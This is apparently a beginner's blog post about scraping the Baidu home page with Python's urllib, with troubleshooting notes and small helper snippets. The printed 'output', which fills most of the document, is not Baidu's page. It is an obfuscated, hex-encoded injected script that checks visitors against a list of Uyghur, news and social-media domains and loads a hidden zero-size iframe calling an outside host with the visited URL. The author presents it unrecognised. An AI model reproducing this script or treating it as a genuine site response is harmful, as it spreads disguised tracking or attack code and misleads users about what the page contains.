Python: Day One of Learning Web Scraping with Python

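Question:

I followed a Python tutorial video to scrape the Baidu home page, but my result differs from the one in the video. Why? (Code and output are further down.)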

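1:

I noticed that IE on my machine reports an error when opening Baidu, while Sogou Browser opens it normally. Also, the result from running the script in Eclipse is identical to the page source that IE shows for the Baidu home page, whereas the source shown in 360 Browser matches the video. Could it be that Eclipse uses IE by default??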

2:

After repairing IE: url=http://www.baidu.com/ still opens with an error, while url=https://www.baidu.com/ opens normally.

Running the script in Eclipse still gives the wrong result.
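Since the https address opens normally in IE while the http one does not, one experiment worth trying is to request the https address from the script as well. Below is a minimal sketch of that idea, not the tutorial's code: the helper names to_https, build_request and fetch, the timeout value, and the User-Agent string are all assumptions made up for illustration.

```python
from urllib import request
from urllib.parse import urlsplit

# Hypothetical browser-like User-Agent string, used only for this experiment.
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"


def to_https(url):
    """Return the same URL with its scheme switched to https."""
    return urlsplit(url)._replace(scheme="https").geturl()


def build_request(url, user_agent=BROWSER_UA):
    """Build a Request object that carries a browser-like User-Agent header."""
    return request.Request(url, headers={"User-Agent": user_agent})


def fetch(url, timeout=10):
    """Send the request and return the decoded body (needs network access)."""
    with request.urlopen(build_request(url), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Usage (commented out because it needs a network connection):
# html = fetch(to_https("http://www.baidu.com/"))
# print(len(html))
```

Comparing the length and the first few lines of the http and https responses would show whether the two addresses really return different pages to the script.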

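3:

I switched to url=http://www.kugou.com/. IE and Sogou show the same page source for it, but the result in Eclipse still looks odd... So the problem has nothing to do with the browser.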

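4:

I found out why the scraped Kugou home page looked wrong.

The result was actually correct. The Eclipse Console limits its output by default (it shows only the last 80000 characters); after unchecking that option, the output displays normally.

As for Baidu... I still don't know why. I tried another computer and got the same result.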
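The console limit from step 4 can also be sidestepped by writing the response to a file and opening it in an editor, instead of printing it. A minimal sketch, assuming a hypothetical helper save_text and an output file name chosen only for illustration:

```python
from pathlib import Path


def save_text(text, path):
    """Write text to a UTF-8 file and return the number of characters written."""
    Path(path).write_text(text, encoding="utf-8")
    return len(text)


# Usage with the `response` string from the script in this post:
# count = save_text(response, "page.html")   # "page.html" is a made-up file name
# print(count, "characters saved")
```

Printing only the character count keeps the console output short, so the console buffer size no longer affects what is seen.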


Environment: Python 3.x + Eclipse

The code:


import re
from urllib import request

url = r"http://www.baidu.com/"

# Create a custom request object
req = request.Request(url)

# Send the request, read the response body and decode it as UTF-8
response = request.urlopen(req).read().decode('utf-8')

# pat = r"<title>(.*?)</title>"    # clean the data with a regular expression
# data = re.findall(pat, response)

print(response)
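The two commented-out lines are the data-cleaning step: a regular expression that pulls the page title out of the HTML. A small sketch of how that step behaves, run on a made-up sample string rather than on a live response (the names TITLE_PATTERN, extract_titles and sample are assumptions for illustration):

```python
import re

# Same pattern as the commented-out line in the script.
# re.S lets "." match newlines; re.I accepts <TITLE> as well.
TITLE_PATTERN = re.compile(r"<title>(.*?)</title>", re.S | re.I)


def extract_titles(html):
    """Return every <title> text found in the HTML string, stripped of whitespace."""
    return [t.strip() for t in TITLE_PATTERN.findall(html)]


# Made-up sample page, not a real response.
sample = "<html><head><title>百度一下,你就知道</title></head><body></body></html>"
print(extract_titles(sample))  # ['百度一下,你就知道']
```

If the fetched page contains no title element, the function returns an empty list, which is a quick sign that the response is not the page that was expected.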

 

Output after running:


<!DOCTYPE html>
<html lang="zh-CN"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<script type="text/javascript">
    (function(t,e){function n(){var e;try{e=new XMLHttpRequest}catch(n){for(var c=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.5.0","MSXML2.XMLHTTP.4.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"],o=0;o<c.length&&!e;o++)try{e=new ActiveXObject(c[o])}catch(n){}}return e?e:(alert("Error creating the XMLHttpRequest object."),void(location.href=t))}function c(t,e){if(o)try{o.open("GET",t,!0),o.onreadystatechange=function(){if(4==o.readyState)if(200==o.status)try{e(o.responseText)}catch(t){}else document.write("HTTP Status "+o.status),document.close()},o.send(null)}catch(n){document.write("Can't connect to server:\n"+n),document.close()}}var o=n()
c(t,function(t){document.write(t),document.close(); setTimeout(function(){var n1 = document.createElement("script");n1.setAttribute("type","text/javascript");n1.setAttribute("src",e);    (document.head||document.getElementsByTagName('head')[0]).appendChild(n1);},1000);})})('http://www.baidu.com/?t=912558218',"var __encode ='sojson.com', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var __Ox3e844=["\x6E\x75\x72\x2E\x63\x6E","\x69\x7A\x64\x61\x2E\x63\x6F\x6D","\x62\x61\x64\x61\x6D\x62\x69\x7A\x2E\x63\x6F\x6D","\x75\x71\x75\x72\x2E\x63\x6E","\x75\x6C\x69\x6E\x69\x78\x2E\x63\x6F\x6D","\x65\x79\x6E\x65\x6B\x2E\x6E\x65\x74","\x65\x79\x6E\x65\x6B\x2E\x62\x69\x7A","\x63\x68\x65\x6E\x67\x61\x62\x6C\x65\x2E\x6E\x65\x74","\x78\x6D\x64\x35\x2E\x63\x6F\x6D","\x78\x6D\x64\x35\x2E\x6F\x72\x67","\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D","\x74\x77\x69\x74\x74\x65\x72\x2E\x63\x6F\x6D","\x75\x68\x72\x70\x2E\x6F\x72\x67","\x69\x73\x74\x69\x71\x6C\x61\x6C\x68\x65\x77\x65\x72\x2E\x63\x6F\x6D","\x6D\x61\x61\x72\x69\x70\x2E\x6F\x72\x67","\x74\x72\x74\x2E\x6E\x65\x74\x2E\x74\x72","\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x74\x69\x6D\x65\x73\x2E\x63\x6F\x6D","\x75\x79\x67\x68\x75\x72\x61\x6D\x61\x72\x69\x63\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x63\x6F\x6E\x67\x72\x65\x73\x73\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x65\x6E\x73\x65\x6D\x62\x6C\x65\x2E\x63\x6F\x2E\x75\x6B","\x75\x79\x67\x68\x75\x72\x69\x73\x74\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x6A\x61\x70\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x70\x72\x65\x73\x73\x2E\x63\x6F\x6D","\x75\x79\x67\x68\x75\x72\x79\x61\x72\x2E\x6F\x72\x67","\x75\x79\x68\x65\x77\x65\x72\x2E\x62\x69\x7A","\x75\x79\x6D\x61\x61\x72\x69\x70\x2E\x63\x6F\x6D","\x61\x6B\x61\x64\x
65\x6D\x69\x79\x65\x2E\x6F\x72\x67","\x69\x73\x74\x69\x71\x6C\x61\x6C\x2E\x6E\x65\x74","\x69\x75\x68\x72\x64\x66\x2E\x6F\x72\x67","\x6F\x6C\x69\x6D\x61\x6C\x61\x72\x2E\x6F\x72\x67","\x72\x66\x61\x2E\x6F\x72\x67","\x75\x6E\x74\x72\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x6E\x65\x74\x2E\x6F\x72\x67","\x61\x61\x77\x73\x61\x74\x2E\x63\x6F\x6D","\x61\x68\x73\x65\x6E\x64\x65\x72\x2E\x63\x6F\x6D","\x62\x65\x68\x69\x6E\x64\x2D\x62\x61\x72\x73\x2E\x6E\x65\x74","\x62\x65\x73\x74\x67\x6F\x72\x65\x2E\x63\x6F\x6D","\x62\x69\x6C\x69\x71\x69\x7A\x2E\x63\x6F\x6D","\x62\x69\x71\x6C\x65\x2E\x63\x6F\x6D","\x62\x6C\x69\x70\x2E\x74\x76","\x63\x68\x69\x6E\x65\x73\x65\x2E\x75\x68\x72\x70\x2E\x6F\x72\x67","\x63\x68\x69\x6E\x65\x73\x65\x62\x6C\x6F\x67\x2E\x75\x68\x72\x70\x2E\x6F\x72\x67","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x62\x75\x6C\x74\x65\x6E\x69\x2E\x63\x6F\x6D","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x63\x61\x2E\x74\x72\x2E\x67\x67","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x73\x65\x6D\x70\x6F\x7A\x79\x75\x6D\x75\x2E\x63\x6F\x6D","\x64\x6F\x77\x6E\x65\x75\x2E\x6F\x72\x67","\x64\x6F\x77\x6E\x6C\x6F\x61\x64\x64\x61\x69\x6C\x79\x6D\x6F\x74\x69\x6F\x6E\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x2D\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2E\x74\x76","\x65\x61\x73\x74\x65\x72\x6E\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x74\x75\x72\x6B\x65\x73\x74\x61\x6E\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2D\x67\x6F\x76\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2D\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x63\x63\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x69\x6E\x65\x78\x69\x6C\x65\x2E\x75\x73","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x69\x6E\x66\x6F\x2E\x63\x6F\x6D","\x72\x66\x69\x2E\x6
6\x72","\x63\x68\x6F\x73\x75\x6E\x2E\x63\x6F\x6D","\x63\x6E\x61\x2E\x63\x6F\x6D\x2E\x74\x77","\x72\x74\x68\x6B\x2E\x68\x6B","\x73\x74\x68\x65\x61\x64\x6C\x69\x6E\x65\x2E\x63\x6F\x6D","\x6F\x72\x69\x65\x6E\x74\x61\x6C\x64\x61\x69\x6C\x79\x2E\x6F\x6E\x2E\x63\x63","\x69\x2D\x63\x61\x62\x6C\x65\x2E\x63\x6F\x6D","\x6D\x69\x6E\x67\x70\x61\x6F\x6D\x6F\x6E\x74\x68\x6C\x79\x2E\x63\x6F\x6D","\x79\x7A\x7A\x6B\x2E\x63\x6F\x6D","\x6E\x65\x78\x74\x6D\x65\x64\x69\x61\x2E\x63\x6F\x6D","\x63\x68\x69\x6E\x65\x73\x65\x70\x65\x6E\x2E\x6F\x72\x67","\x62\x6F\x78\x75\x6E\x2E\x63\x6F\x6D","\x6D\x69\x6E\x67\x6A\x69\x6E\x67\x6E\x65\x77\x73\x2E\x63\x6F\x6D","\x62\x65\x69\x6A\x69\x6E\x67\x73\x70\x72\x69\x6E\x67\x2E\x63\x6F\x6D","\x6D\x73\x67\x75\x61\x6E\x63\x68\x61\x2E\x63\x6F\x6D","\x62\x6F\x74\x61\x6E\x77\x61\x6E\x67\x2E\x63\x6F\x6D","\x77\x72\x63\x68\x69\x6E\x61\x2E\x6F\x72\x67","\x6F\x70\x65\x6E\x2E\x63\x6F\x6D\x2E\x68\x6B","\x61\x62\x6F\x6C\x75\x6F\x77\x61\x6E\x67\x2E\x63\x6F\x6D","\x36\x70\x61\x72\x6B\x2E\x63\x6F\x6D","\x63\x72\x65\x61\x64\x65\x72\x73\x2E\x6E\x65\x74","\x77\x65\x6E\x78\x75\x65\x63\x69\x74\x79\x2E\x63\x6F\x6D","\x73\x69\x6E\x6F\x76\x69\x73\x69\x6F\x6E\x2E\x6E\x65\x74","\x68\x61\x76\x65\x38\x2E\x74\x76","\x70\x6F\x70\x79\x61\x72\x64\x2E\x6F\x72\x67","\x6D\x69\x74\x62\x62\x73\x2E\x63\x6F\x6D","\x6F\x7A\x63\x68\x69\x6E\x65\x73\x65\x2E\x63\x6F\x6D","\x79\x6F\x72\x6B\x62\x62\x73\x2E\x63\x61","\x77\x65\x73\x74\x63\x61\x2E\x63\x6F\x6D","\x74\x6F\x6B\x79\x6F\x63\x6E\x2E\x63\x6F\x6D","\x31\x36\x33\x2E\x63\x6F\x6D","\x71\x71\x2E\x63\x6F\x6D","\x69\x66\x65\x6E\x67\x2E\x63\x6F\x6D","","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x74\x6F\x70","\x6C\x6F\x67","\x70\x61\x72\x65\x6E\x74","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x6C\x65\x6E\x67\x74\x68","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x69\x6D\x6D\x6F\x72\x74\x61\x6C\x5F","\x65\x72\x72\x6F\x72","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x
74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x72\x6F\x70\x73\x2E\x61\x71\x66\x65\x6E\x2E\x63\x6F\x6D\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x2F\x70\x75\x62\x6C\x69\x63\x2F\x3F\x73\x79\x73\x64\x61\x74\x61\x3D","\x26\x68\x6F\x73\x74\x3D","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72","\x68\x65\x69\x67\x68\x74","\x77\x69\x64\x74\x68","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x64\x72\x6F\x70\x73\x2E\x61\x71\x66\x65\x6E\x2E\x63\x6F\x6D\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x2F\x70\x75\x62\x6C\x69\x63\x2F\x3F\x73\x79\x73\x64\x61\x74\x61\x3D","\x22\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"];var stander_url= new Array(__Ox3e844[0x0],__Ox3e844[0x1],__Ox3e844[0x2],__Ox3e844[0x3],__Ox3e844[0x4],__Ox3e844[0x5],__Ox3e844[0x6],__Ox3e844[0x7],__Ox3e844[0x8],__Ox3e844[0x9],__Ox3e844[0xa],__Ox3e844[0xb],__Ox3e844[0xc],__Ox3e844[0xd],__Ox3e844[0xe],__Ox3e844[0xf],__Ox3e844[0x10],__Ox3e844[0x11],__Ox3e844[0x12],__Ox3e844[0x13],__Ox3e844[0x14],__Ox3e844[0x15],__Ox3e844[0x16],__Ox3e844[0x17],__Ox3e844[0x18],__Ox3e844[0x19],__Ox3e844[0x1a],__Ox3e844[0x1b],__Ox3e844[0x1c],__Ox3e844[0x1d],__Ox3e844[0x1e],__Ox3e844[0x1f],__Ox3e844[0x20],__Ox3e844[0x21],__Ox3e844[0x22],__Ox3e844[0x1a],__Ox3e844[0x23],__Ox3e844[0x24],__Ox3e844[0x25],__Ox3e844[0x26],__Ox3e844[0x27],__Ox3e844[0x28],__Ox3e844[0x29],__Ox3e844[0x2a],__Ox3e844[0x2b],__Ox3e844[0x2c],__Ox3e844[0x2d],__Ox3e844[0x2e],__Ox3e844[0x2f],__Ox3e844[0x30],__Ox3e844[0x31],__Ox3e844[0x32],__Ox3e844[0x33],__Ox3e844[0x34],__Ox3e844[0x35],__Ox3e844[0x36],__Ox3e844[0x37],__Ox3e844[0x38],__Ox3e844[0x39],__Ox3e844[0x3a],__Ox3e844[0x3b],__Ox3e844[0x3c],__Ox3e844[0x3d],__Ox3e844[0x3e],__Ox3e844[0x3f],__Ox3e844[0x40],__Ox3e844[0x41],__Ox3e844[0x42],__Ox3e844[0x43],__Ox3e844[0x44],__Ox3e844[0x45]
,__Ox3e844[0x46],__Ox3e844[0x47],__Ox3e844[0x48],__Ox3e844[0x49],__Ox3e844[0x4a],__Ox3e844[0x4b],__Ox3e844[0x4c],__Ox3e844[0x4d],__Ox3e844[0x4e],__Ox3e844[0x4f],__Ox3e844[0x50],__Ox3e844[0x51],__Ox3e844[0x52],__Ox3e844[0x53],__Ox3e844[0x54],__Ox3e844[0x55],__Ox3e844[0x56],__Ox3e844[0x57]);var sysdata=__Ox3e844[0x58];var url=__Ox3e844[0x58];try{url= window[__Ox3e844[0x5b]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(M){console[__Ox3e844[0x5c]](M);if(window[__Ox3e844[0x5d]]){try{url= window[__Ox3e844[0x5d]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(L){console[__Ox3e844[0x5c]](L);url= __Ox3e844[0x58]}}};if(url=== __Ox3e844[0x58]){url= document[__Ox3e844[0x59]]};if(url=== __Ox3e844[0x58]){url= window[__Ox3e844[0x5f]][__Ox3e844[0x5e]]};function inarray(url,stander_url){for(var _0xf050x5=0;_0xf050x5< stander_url[__Ox3e844[0x60]];_0xf050x5++){if(url[__Ox3e844[0x61]](stander_url[_0xf050x5])!=  -1){return true}};return false}if(!inarray(url,stander_url)){var cookie_str=document[__Ox3e844[0x62]];if(cookie_str[__Ox3e844[0x61]](__Ox3e844[0x63])!=  -1){throw  new Error(__Ox3e844[0x64])}};try{var iframe=document[__Ox3e844[0x66]](__Ox3e844[0x65]);iframe[__Ox3e844[0x67]]= __Ox3e844[0x68]+ sysdata+ __Ox3e844[0x69]+ url;iframe[__Ox3e844[0x6a]]= 0;iframe[__Ox3e844[0x6b]]= 0;iframe[__Ox3e844[0x6c]]= 0;document[__Ox3e844[0x6e]][__Ox3e844[0x6d]](iframe)}catch(e){console[__Ox3e844[0x5c]](e);document[__Ox3e844[0x71]](__Ox3e844[0x6f]+ sysdata+ __Ox3e844[0x69]+ url+ __Ox3e844[0x70])}");
</script>
</head>
<body style="display:none">
</body>
</html>
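The output above consists of a script in the head and an empty, hidden body, so it carries no visible page text at all. One way to notice this kind of response programmatically is to count the text inside the body. The following is only a sketch under that assumption; the names BodyTextCounter and body_text_length are hypothetical, and the check does not explain where such a response comes from.

```python
from html.parser import HTMLParser


class BodyTextCounter(HTMLParser):
    """Count non-whitespace-trimmed text characters inside <body>, skipping scripts and styles."""

    def __init__(self):
        super().__init__()
        self.in_body = False
        self.skip_depth = 0   # > 0 while inside <script> or <style>
        self.chars = 0

    def handle_starttag(self, tag, attrs):
        if tag == "body":
            self.in_body = True
        elif tag in ("script", "style"):
            self.skip_depth += 1

    def handle_endtag(self, tag):
        if tag == "body":
            self.in_body = False
        elif tag in ("script", "style") and self.skip_depth:
            self.skip_depth -= 1

    def handle_data(self, data):
        if self.in_body and not self.skip_depth:
            self.chars += len(data.strip())


def body_text_length(html):
    """Return how many text characters the page body contains."""
    parser = BodyTextCounter()
    parser.feed(html)
    parser.close()
    return parser.chars


# Usage with the `response` string from the script in this post:
# if body_text_length(response) == 0:
#     print("The body is empty; this is probably not the real page.")
```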
